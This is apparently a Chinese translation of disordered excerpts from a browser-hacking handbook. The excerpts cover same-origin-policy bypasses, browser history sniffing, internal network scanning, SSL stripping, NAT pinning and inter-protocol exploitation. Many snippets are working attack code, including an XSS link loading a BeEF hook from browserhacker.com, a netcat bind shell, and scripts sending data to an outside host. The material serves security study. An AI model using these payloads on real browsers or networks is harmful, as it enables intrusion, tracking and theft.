text
stringlengths
64
2.99M
38 Krzysztof Kotowicz. (2011). Cross domain content extraction with fake captcha . Retrieved May 11, 2013 from http://blog.kotowicz.net/2011/07/cross-domain-content-extraction-with.html 图 4-19 用户可见的小部分内容 图 4-20 放大内嵌框架可以看到更多内容 如果用户在Security Code输入框中三击鼠标,就会复制整行内容,如图4-20所示。
这里的Security Code输入框并不是真正的输入框,而是一个内嵌框架,看下面的代码就知道了: <style> iframe#one { margin: 0; padding: 0; width: 9em; height: 1em; border: 2px inset black; font: normal 13px/14px monospace; display: inline-block; } </style> <p> <label>Security code:</label><iframe id=one scrolling=no src="http://browservictim.com/any"></iframe> </p> 攻击目标把内容粘贴到第二个输入字段时,实际上粘贴的是整行内容,而且整行内容完全暴露给你了。
此时(如图4-21所示),就可以取得一个防御XSRF的token,利用它可以对内嵌框架中的源实施进一步攻击。 图 4-21 用户粘贴的整行是防御XSRF的token 这个技术可以跨域提取内容,从而绕过SOP。
39 Zeljka Zorz. (2011). Facebook spammers trick users into sharing anti-CSRF tokens . Retrieved May 11, 2013 from http://www.net-security.org/secworld.php?id=11857 另一种跨域提取内容的技术是Luca De Fulgentis发现的从内嵌框架到内嵌框架的拖放 40 。
40 Luca De Fulgentis. (2012). UI Redressing Mayhem: Firefox 0day and the Leakedin Affair . etrieved May 11, 2013 from http://blog.nibblesec.org/2012/12/ui-redressing-mayhem-firefox-0day-and.html 实施这种攻击,必须控制拖放的目标框架。
看看下面这个链接: 41 Andrew Clover. (2002). CSS visited pages disclosure . Retrieved May 11, 2013 from http://seclists.org/bugtraq/2002/Feb/271 <a id="site_1" href="http://browservictim.com">link</a> 可以使用CSS动作选择符,来检测攻击目标是否访问过前面的链接,进而会存在于浏览器历史记录中: #site_1:visited { background: url(/browserhacker.com?site=browservictim); } 这里使用的是background选择符,实际上任何可以指定URI的选择符都可以使用。 在这里,如果浏览器历史中存在broswervictim.com,那浏览器就会提交一个指向 browserhacker.com?site=browservictim 的GET请求。
再通过对比之前覆盖的红色样式,如果匹配,则说明相应的网站存在于浏览器历史中。 比如下面这个例子: 42 Jeremiah Grossman. (2007). CSS History Hack . Retrieved May 11, 2013 from http://ha.ckers.org/weird/CSS-history-hack.html <html> <head> <style> #link:visited {color: #FF0000;} </style> </head> <body> <a id="link" href="http://browserhacker.com" target="_blank">clickme</a> <script> var link = document.getElementById("link"); var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color"); console.log(color); </script> </body> </html> 如果链接之前被访问过,而且浏览器可以被攻击,那么控制台日志中的输入就会是 rgb(255, 0, 0) ,也就是CSS中的红色。
43 David Baron. (2002). Bug 14777-:visited support allows queries into global history . Retrieved May 11, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=147777 2. 使用缓存计时 Felten和Schneider 44 在2000年最早对外发表了关于缓存计时攻击的研究论文。
44 Edward W. Felten and Michael A. Schneider. (2012). Timing Attacks on Web Privacy . Retrieved May 11, 2013 from http://selfsecurity.org/technotes/websec/webtiming.pdf Michal Zalewski探索过一个提取浏览器缓存的非破坏性的技术 45 ,与缓存计时技术类似。
45 Michal Zalewski. (2012). Rapid history extraction through non-destructive cache timing . Retrieved May 11, 2013 from http://lcamtuf.coredump.cx/cachetime/ Zalewski的方法涉及把资源加载到内嵌框架、触发SOP和防止缓存变更。
图 4-22 使用缓存计时获取浏览器历史记录 在浏览这两个网站时,通常会加载的两个资源是: http://wikileaks.org/squelettes/random.js http://www.abovetopsecret.com/forum/ats-scripts.js 这一技术的核心代码如下: function wait_for_noread() { try { /* * 这里存在SOP漏洞 * 因为要读取内嵌框架中加载的跨源资源的location.href */ if (frames['f'].location.href == undefined) throw 1; /* * 到 TIME_LIMIT之前,不断从内嵌框架中读取location.href * 否则调用maybe_test_next()重置内嵌框架的src为about:blank * 防止完全加载资源而替代缓存 * 然后处理下一个资源 */ if (cycles++ >= TIME_LIMIT) { maybe_test_next(); return; } setTimeout(wait_for_noread, 1); } catch (e) { /* * 找到SOP同源 * 确认资源已缓存 */ confirmed_visited = true; maybe_test_next(); } } 如果在某个超时时间之前触发SOP,说明命中了缓存。
图 4-23 违反SOP报错 有关这个技术的完整源代码,可以看 https://browserhacker.com ,或者Wiley的网站 www.wiley.com/go/browserhackershandbook ,其中最初的三个PoC是经过修改的,合并成了一个单独的代码片段。
如果你的浏览器之前缓存过一张图片,那么从缓存中加载它,通常耗时不超过10毫秒。 而如果浏览器的缓存中没有这张图片,那么从互联网获取它的时间就要看网络延迟和图片大小了。
下面的例子展示了这个技术的原理: 46 Mansour Behabadi. (2012). visipisi . Retrieved May 11, 2013 from http://oxplot.github.com/visipisi/visipisi.html // 检查是否已访问过Twitter var url = "https://twitter.com/images/spinner.gif"; var loaded = false; var img = new Image(); var start = new Date().getTime(); img.src = url; var now = new Date().getTime(); if (img.complete) { delete img; console.log("visited"); } else if (now - start > 10) { delete img; window.stop(); console.log("not visited"); }else{ console.log("not visited"); } 如果在Firefox或Chrome中打开这段代码,而且你之前访问过Twitter,那么应该在浏览器控制台(Firebug或Developer Tools)中看到“visited”字样。 相反,如果由于没有缓存过,图片加载时间超过10毫秒,并且正在从Twitter网站中获取该图片,那么就会看到“not visited”。
下面看看展示了该问题的代码: var av_if = document.createElement("iframe"); av_if.setAttribute('src', "browser:home"); av_if.setAttribute('name','av_if'); av_if.setAttribute('width','0'); av_if.setAttribute('heigth','0'); av_if.setAttribute('scrolling','no'); document.body.appendChild(av_if); var vstr = {value: ""}; //如果渲染引擎是Firefox,这将有效 window['av_if'].navigator.AFRunCommand(60003, vstr); alert(vstr.value); 这段代码把享有特权的browser:home地址加载到内嵌框架,然后在navigator对象上执行 AFRunCommand() 函数。
在Liverani的研究中,他暴力破解了传给这个函数第一个参数的一些整数值,发现向 AFRunCommand() 传入60003和一个JSON对象,就可以取得完整的浏览器历史记录。
如果你欺骗目标用户打开类似如下的链接,那么恶意注入的代码就会被持久存入历史页面: 47 Roberto Suggi Liverani. (2012). Maxthon--Cross Context Scripting (XCS)--about:history--Remote Code Execution . Retrieved May 11, 2013 from http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html http://172.16.37.1/malicious.html#" onload='alert(1)'<!- 每次目标打开浏览器历史记录时,都将执行上面包含了 onload 属性的代码。
比如,下面的代码会解析history-list区域中的所有链接: links = document.getElementById('history-list') .getElementsByTagName('a'); result = ""; for(var i=0; i<links.length; i++) { if(links[i].target == "_blank"){ result += links[i].href+"\n"; } } alert(result); 这些代码可以通过下面的链接打包和传递: http://172.16.37.1/malicious.html#" onload='links=document. getElementById("history-list").getElementsByTagName("a"); result="";for(i=0;i<links.length;i++){if(links[i].target=="_blank") {result+=links[i].href+"\n";}}alert(result);'<!-- 重要的是,这种跨内容脚本(第7章会深入讨论)漏洞是一直存在的。
假设要检测172.16.37.0/24这个子网中运行在80端口的Web应用,那可以使用如下代码: var protocol = "http://"; var port = 80; var c_subnet = "172.16.37.0"; // 以下代码返回172.16.37 var c = c_subnet.split( c_subnet.split('.')[3] )[0]; // 添加新的'b'元素,盛放后来添加的IFrame var dom = document.createElement('b'); document.body.appendChild(dom); // 加载IFrame,IFrame指向迭代的IP function check_host(url, id){ var iframe = document.createElement('iframe'); iframe.src = url; iframe.id = "i_" + id; iframe.style.visibility = "hidden"; iframe.style.display = "none"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.onload = function(){ console.log('Internal webapp found: ' + this.src); } dom.appendChild(iframe); } // 通过类C的子网迭代 for(var i=1; i < 255; i++){ var host = c + i; check_host(protocol + host + ":" + port, i); } // 如果IFrame的src不存在,则不会触发onerror事件,因此需要清理DOM setTimeout(function(){ for(var i=1; i < 255; i++){ var del = document.getElementById("i_" + i); dom.removeChild(del); } }, 2000); 对于子网段172.16.37.0/24,前面的代码会迭代所有254个IP,为每个IP添加一个隐藏的内嵌框架。
在JavaScript控制台中运行这段代码,就可以发现使用了其中一个内部域名的Web应用: var protocol = "http://"; var port = 80; // 一般的内部主机名 var hostnames = new Array("about", "accounts", "admin", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml"); // 添加新的'b'元素,将保有附加的IFrame var dom = document.createElement('b'); document.body.appendChild(dom); // 加载隐藏的IFrame,指向当前迭代的主机名 function check_host(url, id){ var iframe = document.createElement('iframe'); iframe.src = url; iframe.id = "i_" + id; iframe.style.visibility = "hidden"; iframe.style.display = "none"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.onload = function(){ console.log('Internal DNS found: ' + this.src); document.body.removeChild(this); }; dom.appendChild(iframe); } // 通过主机名数组迭代 for(var i=1; i < hostnames.length; i++){ check_host(protocol + hostnames[i] + ":" + port, i); } // 如果IFrame的src不存在,则不会触发onerror事件,因此需要清理DOM setTimeout(function(){ for(var i=1; i < 255; i++){ var del = document.getElementById("i_" + i); dom.removeChild(del); } }, 2000); 针对每个域名,都会向DOM中插入相应的内嵌框架。
前面两段代码经过修改,都可以支持其他URI协议,比如https://(不过https://通常在内网中更常见一些),以及支持其他端口,比如443、8080或8443。
17 Moxie Marlinspike. (2009). Moxie Marlinspike >> Software >> sslstrip . Retrieved August 12, 2013 from http://www.thoughtcrime.org/software/sslstrip/ 如图6-19所示,在截获网络通信并检测到数据后,可以把所有HTTPS重写为HTTP。
这个参数可能被XSS利用,把目标浏览器勾连到BeEF: require 'rubygems' require 'thin' require 'rack' require 'sinatra' require 'json' class InjectDemo < Sinatra::Base get "/" do lang = request['lang'] || "en_US"; " <div align=center> To login, go to our secure login page at <A HREF='https://servervictim.com/login?lang=#{lang}'> https://servervictim.com/login</A> </div>" end end @routes = { "/" => InjectDemo.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("servervictim.com", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start 通过操纵 lang 变量,可以注入BeEF勾连代码。
图 6-20 未经XSS的登录页面源 要实现BeEF勾连,需要写一段代码结束 <a> 标签、添加脚本,并确保链接仍然可以显示出来。 以下这个URL会把BeEF勾连代码注入页面: http://servervictim.com:4000/?lang='><script src="http://browserhacker.com:3000/hook.js"></script> 浏览器被勾连到BeEF之后,可以把这个页面由HTTPS降级到HTTP。
敏感一些的用户可能会注意窗口左下角的链接显示为HTTP(如图6-22所示),而在查询源代码的时候,页面中依旧是HTTPS。 图 6-22 新页面在窗口左下角显示链接为HTTP 为了减小被发现的可能性,可以不重写 href 属性的内容,而是为相应的 <a> 元素添加 onclick 事件。 这样,在用户把鼠标放到链接上的时候,窗口左下角出现的就不是HTTP链接了。
18 Nick Arnott. (2013). iPhone Apps Accepting Self-Signed SSL Certificates | Neglected Potential . Retrieved August 12, 2013 from http://www.neglectedpotential.com/2013/01/sslol/ 19 M. Georgiev, R. Anubhai, S. Iyengar, D. Boneh, S. Jana, and V. Shmatikov. (2012). The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software . Retrieved December 1, 2013 from https://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf 据说最严重的证书验证漏洞是Moxie Marlinspike发现的空字符利用 20 。
20 Moxie Marlinspike. (2009). More Tricks For Defeating SSL In Practice . Retrieved August 12, 2013 from http://www.blackhat.com/presentations/bh-usa-09/ARLINSPIKE/BHUSA09-Marlinspike-DefeatSSL-SLIDES.pdf 当检查字符串的函数查找数据时,数据中的空字符通常会被当作字符串的终结符。
通过使用名称www.google.com\0.browserhacker.com来创建证书,注册机构将会把它当作browserhacker.com的一部分,并知道该域的拥有者可以请求该域的证书。
6.3.3 攻击SSL/TLS层 SSL(Secure Socket Layer,安全套接字层)及其继承者TLS(Transport Layer Security,传输层安全),都是用于安全上网的加密协议。
21 Packet Storm. (Unknown Year). Download: Browser Exploit Against SSL/TLS ≈ Packet Storm . Retrieved August 12, 2013 from http://packetstormsecurity.com/files/download/105499/Beast-SSL.rar 22 Dan Goodin. (2013). Two new attacks on SSL decrypt authentication cookies | ars technica . Retrieved August 12, 2013 from http://arstechnica.com/security/2013/03/new-attacks-on-ssl-decrypt-authentication-cookies/ BEAST攻击是第一个引人注目的SSL攻击,利用了CBC(Cipher Block Chaining,密码分组链接)加密模式的漏洞。
Unknown 第 4 章 绕过同源策略 SOP,即同源策略,恐怕是Web领域中最重要的安全机制了。可惜不同浏览器对它的实现有很大的差异。如果SOP不起作用,或者说被绕过去了,那么万维网的核心安全机制就失效了。 SOP的意图是限制不相关的源之间通信。换句话说,如果http://browserhacker.com想访问http://browservictim.com中的信息,SOP是不允许的。当然,根据你使用了什么浏览器,或者使用了什么浏览器插件,这个问题也并非总是如此简单。 本章就来分析各种绕过SOP的技术。SOP是浏览器安全的关键,因此也许当你读到这些技术时,这些漏洞可能已经被补上了。同样,研究也不会止步,也很难说不会有新的技术在改进原有技术的基础上出现。 在使用绕过SOP技术时,经常可能会把被勾连的浏览器作为HTTP代理,通过它访问其他目标。没错,听起来有点怪异,但看完本章你就知道这是可能的了。
20 Sami Kamkar. (2010). NATpin . Retrieved October 29, 2013 from http://samy.pl/natpin/ 使用之前讨论过的侦察技术,假设我们掌握了如下信息。
网关:192.168.0.1 勾连浏览器的内部IP:192.168.0.2 在80端口提供HTTP服务的系统IP:192.168.0.4 在22端口提供SSH服务的系统IP:192.168.0.4 我们知道,端口封禁机制会阻止直接连接22端口。
21 Van Hauser and David Maciejak. (2013). THC Hydra . Retrieved October 29, 2013 from http://www.thc.org/thc-hydra/ 这种攻击的一个先决条件,就是路由器必须支持连接跟踪以实现NAT穿越,而且路由器应该允许出站流量。
22 FDS Team. (2013). Security vulnerability: Routers acting as proxy when sending fake IRC messages . Retrieved October 29, 2013 from http://fds-team.de/cms/articles/2013-06/security-vulnerability-routers-acting-as-proxy-when-sending-fake.html 假设你想利用的路由器在iptables中有如下针对防火墙的配置: # DEF OUTIF=eth0 LANIF=eth1 LAN=192.168.0.0/24 # MODULE modprobe ip_conntrack modprobe ip_conntrack_ftp modprobe iptable_nat # 清理 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain # 内核变量 echo 1 > /proc/sys/net/ipv4/ip_forward # 不限流量 iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT # 默认策略 iptables --policy INPUT DROP iptables --policy OUTPUT DROP iptables --policy FORWARD DROP # 之前初始化和接受的 # 绕过规则检查 # 不限出站流量 iptables -A OUTPUT -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # 放开LAN的入站流量 iptables -A INPUT -i $LANIF -j ACCEPT # NAT ########## iptables -t nat -A POSTROUTING -o $OUTIF -j MASQUERADE # 初始化和接受的WAN到LAN通信 iptables --append FORWARD -m state --state ESTABLISHED,RELATED -i $OUTIF -o $LANIF -j ACCEPT # 不限LAN到WAN的出站通信 iptables --append FORWARD -m state --state NEW,ESTABLISHED,RELATED -o $OUTIF -i $LANIF -j ACCEPT iptables -A INPUT -j LOG --log-level debug iptables -A INPUT -j DROP iptables -A FORWARD -j LOG --log-level debug iptables -A FORWARD -j DROP 以上防火墙和NAT配置符合实现NAT Pinning的要求。
以下JavaScript代码演示了如何发起这个攻击: var privateip = '192.168.0.70'; var privateport = '22'; var connectto = 'browserhacker.com'; function dot2dec(dot){ var d = dot.split('.'); return (((+d[0])*256+(+d[1]))*256+(+d[2]))*256+(+d[3]); } var myIframe = beef.dom.createInvisibleIframe(); var myForm = document.createElement("form"); var action = "http://" + connectto + ":6667/" myForm.setAttribute("name", "data"); myForm.setAttribute("method", "post"); myForm.setAttribute("enctype", "multipart/form-data"); myForm.setAttribute("action", action); //创建DCC消息 x = String.fromCharCode(1); var message = 'PRIVMSG beef :'+x+'DCC CHAT beef '+ dot2dec(privateip)+' '+privateport+x+"\n"; //创建消息文本区域 var myExt = document.createElement("textarea"); myExt.setAttribute("id","msg_1"); myExt.setAttribute("name","msg_1"); myForm.appendChild(myExt); myIframe.contentWindow.document.body.appendChild(myForm); //发送消息 myIframe.contentWindow.document.getElementById( "msg_1").value = message; myForm.submit(); 执行这段JavaScript代码后,浏览器会连接http://browserhacker.com:6667/。
23 Wikipedia. (2013). Direct Client-to-Client . Retrieved October 29, 2013 from http://en.wikipedia.org/wiki/Direct_Client-to-Client 这里的关键在于,当路由器的防火墙发现外出流量并读取IRC数据时,它会认为用户在请求一个DCC连接。
相关的代码片段如下: 24 Harald Welte and Patrick McHardy . (2013). IRC extension for IP connection tracking . Retrieved October 29, 2013 from https://github.com/torvalds/linux/blob/master/net/netfilter/nf_conntrack_irc.c /* dcc_ip can be the internal OR external (NAT'ed) IP */ tuple = &ct->tuplehash[dir].tuple; if (tuple->src.u3.ip != dcc_ip && tuple->dst.u3.ip != dcc_ip) { net_warn_ratelimited( "Forged DCC command from %pI4: %pI4:%u\n", &tuple->src.u3.ip, &dcc_ip, dcc_port); continue; } 以上代码并没有按照注释中描述的那样行事,注释的意思是DCC IP可以是内部或外部NAT之后的IP地址。
25 Regit. (2013). Open SVP . Retrieved October 29, 2013 from https://home.regit.org/software/opensvp/ NAT Pinning攻击很好地说明了如何创造性地利用内网浏览器的请求,去影响更多的外部系统。
26 Wade Alcorn. (2006). Inter-Protocol Communication . Retrieved October 29, 2013 from http://www.bindshell.net/papers/ipc.html 多数情况下,IPC是否成功更多地取决于开发者的实现方式,而非协议规范本身。
为了实现两个不同协议间的通信,必须满足以下两个条件: 目标协议实现中的容错 将目标协议数据封装到HTTP请求中的能力 在浏览器中,这通常意味着将一个HTTP请求发送到不使用HTTP协议的监听服务。
如果发送下面的(非协议)数据,并且连接依然保持活动,就说明该协议的实现有利用价值: ADD foobar 因为与客户端的连接没有被重置,所以客户端可以继续使用原来的TCP连接发送数据。
因此,如果客户端发送以下数据,那么错误的前两行会被丢弃,而第三行可能会被解析并成功执行: ADD foo ADD bar WRITE browserhacker.com /opt/protocol/browserhacker 然后,浏览器IPC就可以在此基础上扩展,把整条消息封装到一个HTTP POST请求里。 下面这个例子展示了一个请求,它可能会在目标服务上执行一条命令: POST / HTTP/1.1 Host: 192.168.1.130:4444 User-Agent: Mozilla/5.0 Content-type: text/plain Content-Length: 51 WRITE browserhacker.com /opt/protocol/browserhacker 这个HTTP请求的首部,连同CRLF(回车换行),都会被丢弃,而请求的最后一行则会被协议正确处理。
而如果使用 text/plain 或 multipart/form-data ,那么在请求体里使用什么格式就完全看你自己了,比如可以添加 CR/LF 行和空格。 有两种方式可以跨域发送 text/plain 或 multipart/form-data 请求。
BeEF的JavaScript API中有一个 createIframeIpecForm() 函数,可以帮你完成这件事: createIframeIpecForm: function(rhost, rport, path, commands){ // 创建不可见内嵌框架 // HTML表单会放在这里 var iframeIpec = beef.dom.createInvisibleIframe(); // 创建HTML表单,注意enctype属性 var formIpec = document.createElement('form'); formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path); formIpec.setAttribute('method', 'POST'); formIpec.setAttribute('enctype', 'multipart/form-data'); // 创建文本区 // 将POST主体添加到文本区 input = document.createElement('textarea'); input.setAttribute('name', Math.random().toString(36).substring(5)); input.value = commands; formIpec.appendChild(input); iframeIpec.contentWindow.document.body.appendChild(formIpec); formIpec.submit(); return iframeIpec; } 可以像下面这样调用该方法: beef.dom.createIframeIpecForm(host, port, path, commands); 注意,多数情况下都不需要 path 参数,而 commands 参数中就是你想通过POST请求体发送的数据。
下面的代码就是这样一个例子: var xhr = new XMLHttpRequest(); var uri = "http://" + host + ":" + port + "/"; xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); xhr.send(command + "\r\n"); 变量 command 中包含着你想发送到协议的数据,后面紧跟一个回车和换行符: \r\n 。
它只要检测到非SMTP命令,就会立即断开与客户端的连接: Aug 10 06:38:17 bt postfix/smtpd[3179]: connect from browservictim.com[172.16.37.1] Aug 10 06:38:17 bt postfix/smtpd[3179]: warning: non-SMTP command from browservictim.com [172.16.37.1]: POST / HTTP/1.1 Aug 10 06:38:17 bt postfix/smtpd[3179]: disconnect from browservictim.com[172.16.37.1] 虽然这些SMTP服务都达不到容错条件,但一些IMAP服务倒是可以。
if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } /* 视为ArrayBufferView...发送: */ this.send(ui8Data); }; } 在写这本书时,其他浏览器还没有这个功能。
不过,只要支持 类型数组 (typed array) 27 ,就可以在相应浏览器中重写 sendAsBinary() 的原型,实现类似功能,比如在Chrome和Safari等基于WebKit的浏览器都可以 28 。
27 Mozilla. (2013). JavaScript Typed Arrays . Retrieved October 29, 2013 from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Typed_arrays 28 Chromium Bugtracker. (2010). Issue 35705: Extend XmlHttpRequest with getAsBinary() and sendAsBinary() methods . Retrieved October 29, 2013 from https://code.google.com/p/chromium/issues/detail?id=35705 3. 协议间通信的例子 接下来将看几个例子,说明怎么利用不同的协议来实现IPC,以及进一步实现IPE的可能性。
执行下面的代码,可以在POSIX系统中设置Netcat绑定shell: nc -lvp 7777 -e /bin/sh 这个命令在7777端口上设置了监听服务,负责把接收的数据发送到 /bin/sh 命令。
对于未知的命令,sh进程会直接给出 command not found : #foobar foobar: command not found # 这个行为非常适合IPC,因为虽然HTTP首部会被丢弃,但其他有效的sh命令会被执行。
比如,要创建第一个响应头,可以发送以下数据: echo -e HTTP/1.1 200 OK\\\\r; 然后可以继续添加需要的其他响应首部,比如Content-type、Content-length,以及命令结果。
这里为了简单起见,只给出截取的一小段代码: [...] // 创建ipc_posix_window内嵌框架 var ipc_posix_window = document.createElement("iframe"); [...] // 通过Hash标签与父框架沟通命令执行结果 body2 = "__END_OF_POSIX_IPC__</div><s"+"cript>window.location='" + parent + "#ipc_result='+encodeURI(" + "document.getElementById(\\\"ipc_content\\\").innerHTML);</" +"script></body></html>"; [...] // 返回ipc_content内容div,执行命令 // 并把命令结果返回给head -c SIZE "echo \"" + body1 + "\";(" + cmd + ")|head -c "+size+" ; "); poster.appendChild(response); [...] // 等待<超时>秒数, // 以让IFrame url片段匹配 function wait() { try { if (/#ipc_result=/.test(document.getElementById("ipc_posix_window").\ contentWindow.location)) { var ipc_result = document.getElementById("ipc_posix_window").\ contentWindow.location.href; output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+ 12,ipc_result.lastIndexOf('__END_OF_POSIX_IPC__')); [...] 这段代码创建了一个隐藏的内嵌框架ipc_posix_window,包含一个发送POST请求的HTML表单。
结果会被附加在URL片段标识符( # )的 ipc_result 后面,类似如下所示: http://browserhacker.com/#ipc_result=%0Atcp%20%20%20%20 %20%20%20%200%20%20%20%20%20%200%20127.0.0.1:7337%20%20 %20%20%20%20%20%20%20%200.0.0.0:*%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20LISTEN%20%20%20%20%20%201545 [...snip...] __END_OF_POSIX_IPC__ 追加到内嵌框架中的HTML表单包含两个输入字段: response 和 endTalkBack 。
第二个 endTalkBack 输入字段包含分隔符 __END_OF_POSIX_IPC__ ,命令结果的 ipc_contentdiv ,以及用于将内嵌框架地址修改为父元素地址的一小段脚本。
父元素地址就是执行当前JavaScript代码的页面地址: body2 = "__END_OF_POSIX_IPC__</div><s"+"cript>window.location='" + parent + "#ipc_result='+encodeURI(" + "document.getElementById(\\\"ipc_content\\\").innerHTML);</" +"script></body></html>"; 图10-13展示了这个POST请求的原始主体,从中可以看到这两个输入字段以及它们的值。
重用BeEF中的JavaScript API createIframeIpecForm ,可以通过如下代码加入频道,并向IRC服务器发送消息: var rhost = 'irc_server'; var rport = '6667'; var nick = 'user1234'; var channel = '#channel_1'; var message = 'BeEFed'; var irc_commands = "NICK " + nick + "\n"; irc_commands += "USER " + nick + " 8 * : " + nick + " user\n"; irc_commands += "JOIN " + channel + "\n"; irc_commands += "PRIVMSG " + channel + " :" + message + "\nQUIT\n"; // 发送命令 var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands); // 清除 cleanup = function() { document.body.removeChild(irc_iframe); } setTimeout("cleanup()", 15000); 2010年的时候,不少IRC提供商,像EFnet、OFTC和FreeNode,都受到过持续攻击 29 。
29 Dan Goodin. (2010). Firefox inter-protocol attack . Retrieved October 29, 2013 from http://www.theregister.co.uk/2010/01/30/firefox_interprotocol_attack/ 30 Freenode blog. (2013). JavaScript spam . Retrieved October 29, 2013 from http://blog.freenode.net/2010/01/javascript-spam/ (3) 打印服务IPC的例子 HP、Canon等多功能网络打印机都会运行很多服务,其中通常包括对TCP/IP协议栈的完整实现。
31 Deral Heiland. (2011). From printer to pwnd . Retrieved October 29, 2013 from http://foofus.net/goons/percx/defcon/P2PWND.pdf Aaron Weaver在2007年发表了一篇题为“Cross-site Printing”的论文,演示了如何在浏览器中向网络打印机发送打印作业 32 。
32 Aaron Weaver. (2007). Cross site printing . Retrieved October 29, 2013 from http://www.net-security.org/dl/articles/CrossSitePrinting.pdf 33 HP Support Center. (2013). HP Jetdirect Print Servers . Retrieved October 29, 2013 from http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?prodSeriesId=308316&objectID=c00048636 图 10-16 nmap打印机扫描 这个接口非常基础,只要求你打开一个指向打印机端口的TCP连接,然后写入文本即可。
通过Netcat可以非常简单地做到: $ nc 10.90.1.131 9100 Hi from BeEF! ^C 这个协议也是实施IPC的不错目标,因为并没有什么阻止你使用HTTP的POST请求,向打印机端口发送类似的数据。
以下代码可以用于向打印机发送“Hi from BeEF!”消息: var body = "Hi from BeEF!\n"; var ip = "10.90.1.131"; var port = 9100; var xhr = new XMLHttpRequest(); xhr.open("POST", "http://" + ip + ":" + port + "/",false); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); xhr.send(body); 无需认证,可以使用IPC。
以下代码演示了如何使用PostScript,而且这段代码可以通过修改 body 变量,与使用之前的JavaScript代码一起使用: 34 Adobe. (1999). PostScript language reference . Retrieved October 29, 2013 from http://partners.adobe.com/public/developer/en/ps/PLRM.pdf var body = String.fromCharCode(27) + "%-12345X@PJL ENTER LANGUAGE = POSTSCRIPT\r\n" + "%!PS\r\n" + "/Courier findfont\r\n" + "20 scalefont\r\n" + "setfont\r\n" + "72 500 moveto\r\n" + "(Demonstrating IPC) show\r\n" + "showpage\r\n" + String.fromCharCode(27) + "%-12345X"; 结果如图10-18所示,打印出来的内容“Demonstrating IPC”字体为Courier,位置为距左边72单位,距顶边500单位。
为了演示方便,在Firefox中可以通过添加以下代码到扩展文件pref.js,以重写端口封禁规则: pref("network.security.ports.banned.override", "143"); 别忘了完事以后删除它。
下面的示例代码演示了登录和退出IMAP服务器的过程: var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root password\na002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit(); 这个例子中的IMAP服务器是Eudora,稍后我们会再用它来演示协议间利用。
2007年,Alcorn在一篇研究论文中表明 35 ,IPC技术不仅可以实现通信,还可以实现利用,也就是IPE(Inter-protocol Exploitation,协议间利用)。
35 Wade Alcorn. (2007). Inter-Protocol Exploitation . Retrieved October 29, 2013 from http://nccgroup.com/media/18511/inter-protocol_exploitation.pdf 36 Chris Anley, John Heasman, Felix Lindner, and Gerardo Richarte. (2007). The Shellcoder's Handbook, 2nd Edition . Retrieved October 29, 2013 from http://eu.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html 如果你能像上一节演示的那样,使用HTTP与非HTTP协议通信,那么也应该可以在发送的数据中包含Shellcode。
比如,假设有一个服务会查找如下命令: WRITE <content> <file_path> 假设处理 <file_path> 的代码存在缓冲区溢出漏洞,可能是因为使用 memcpy 复制内容,但并没有检查来源长度,而直接把内容放到了1024字节的缓冲区内。
